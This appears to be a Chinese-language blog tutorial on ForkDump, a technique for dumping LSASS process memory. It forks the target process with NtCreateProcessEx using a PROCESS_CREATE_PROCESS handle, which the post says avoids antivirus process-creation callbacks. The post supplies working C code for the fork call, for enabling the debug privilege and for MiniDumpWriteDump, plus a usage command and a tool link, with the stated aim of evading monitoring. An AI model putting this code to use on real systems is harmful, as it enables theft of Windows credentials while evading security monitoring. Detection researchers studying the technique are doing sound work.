ForkDump进行内存转储

 

使用远程进程分叉,可以用来转储 LSASS 分叉进程的内存来逃避监控或阻止访问 LSASS 进程的AV,可能会绕过一些杀毒进行内存DUMP。

twitter上的有人提到,可以用PROCESS_CREATE_PROCESS权限就可以克隆目标进程去读取任何东西。

image-20211203125825909

主要用到了OpenProcess和NtCreateProcessEx,就是类似于fork一个进程,然后我们去正常的MiniDumpWriteDump就可以获取目标进程的内存数据

​ 要打开一个进程进行操作,我们通常先获取目标进程的句柄。通常使用OpenProcess()来获取

HANDLE OpenProcess(
  [in] DWORD dwDesiredAccess,
  [in] BOOL  bInheritHandle,
  [in] DWORD dwProcessId
);

​ 第一个参数指定对进程的访问权限,具体可以指定的全部访问权限如链接:https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights

​ 这个远程进程分叉用到的是PROCESS_CREATE_PROCESS

PROCESS_CREATE_PROCESS,此访问权限允许具有包含此访问权限的进程句柄的进程就可以代表该进程创建进程。

然后需要创建进程,用到的是NtCreateProcessEx

函数原型

NTSTATUS NtCreateProcessEx(
    __out PHANDLE ProcessHandle,
    __in ACCESS_MASK DesiredAccess,
    __in_opt POBJECT_ATTRIBUTES ObjectAttributes,
    __in HANDLE ParentProcess,
    __in ULONG Flags,
    __in_opt HANDLE SectionHandle,
    __in_opt HANDLE DebugPort,
    __in_opt HANDLE ExceptionPort,
    __in ULONG JobMemberLevel
);

函数参数:

ProcessHandle,输出参数,如果创建成功,则它返回所创建的进程的句柄。
DesiredAccess 新进程的访问权限。
ObjectAttributes,可选参数,指定了新进程的对象属性。
ParentProcess:新进程的父进程句柄。如果这个参数没有设定,即新进程没有父进程,新进程使用系统地址空间创建。
Flags :进程创建的标志。
SectionHandle :内存区域映射句柄,用来创建进程的地址空间,**如果这个参数没有设定,新进程的地址空间是一个简单的克隆父进程的地址空间。**
DebugPort  一个端口对象的句柄,被用于进程的调试端口。
ExceptionPort :一个端口对象的句柄,被用于进程的异常端口。
JobMemberLevel :新进程的在 jobset 中的等级。

​ 通过为 SectionHandle 传递NULL 并为 ParentProcess 参数传递目标的 PROCESS_CREATE_PROCESS 句柄,将创建远程进程的分支,攻击者将收到分支进程的句柄。此外,只要攻击者不创建任何线程,就不会触发进程创建回调。这意味着攻击者可以读取目标的敏感内存,而AV甚至不知道子进程已经创建。

NtCreateProcessEx(&this->CurrentSnapshotProcess,
							   PROCESS_ALL_ACCESS,
							   NULL,
							   this->TargetProcess,
							   0,
							   NULL,
							   NULL,
							   NULL,
							   0);

然后正常的赋予debug的priv并且dump即可

提升debug权限:

BOOL
EscalateDebugPrivilege (
    VOID
    )
{
    BOOL result;
    HANDLE currentToken;
    LUID currentDebugValue;
    TOKEN_PRIVILEGES newTokenPrivilege;

    result = FALSE;
    currentToken = NULL;

    //
    // Open the current processes' token.
    //
    if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &currentToken) == FALSE)
    {
        printf("Failed to open the token of the current process with the last error %i.\n", GetLastError());
        goto Exit;
    }

    //
    // Lookup the LUID of the debug privilege.
    //
    if (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &currentDebugValue) == FALSE)
    {
        printf("Failed to lookup the current debug privilege with the last error %i.\n", GetLastError());
        CloseHandle(currentToken);
        goto Exit;
    }

    //
    // Create our elevated token privilege.
    //
    newTokenPrivilege.PrivilegeCount = 1;
    newTokenPrivilege.Privileges[0].Luid = currentDebugValue;
    newTokenPrivilege.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    //
    // Adjust the current processes' token.
    //
    if (AdjustTokenPrivileges(currentToken, FALSE, &newTokenPrivilege, sizeof(newTokenPrivilege), NULL, NULL) == FALSE || 
        GetLastError() != ERROR_SUCCESS)
    {
        printf("Failed to adjust debug privileges with the last error %i.\n", GetLastError());
        CloseHandle(currentToken);
        goto Exit;
    }

    result = TRUE;
Exit:
    if (currentToken)
    {
        CloseHandle(currentToken);
    }
    return result;
}

MiniDump:

    if (MiniDumpWriteDump(snapshotProcess, GetProcessId(snapshotProcess), dumpFile, MiniDumpWithFullMemory, NULL, NULL, NULL) == FALSE)
    {
        printf("Failed to create a dump of the forked process with the last error %i.\n", GetLastError());
        goto Exit;
    }

用法:

ForkDump-x64.exe lsass.dmp 656

https://github.com/D4stiny/ForkPlayground

参考

https://bbs.pediy.com/thread-114958.htm

https://billdemirkapi.me/abusing-windows-implementation-of-fork-for-stealthy-memory-operations/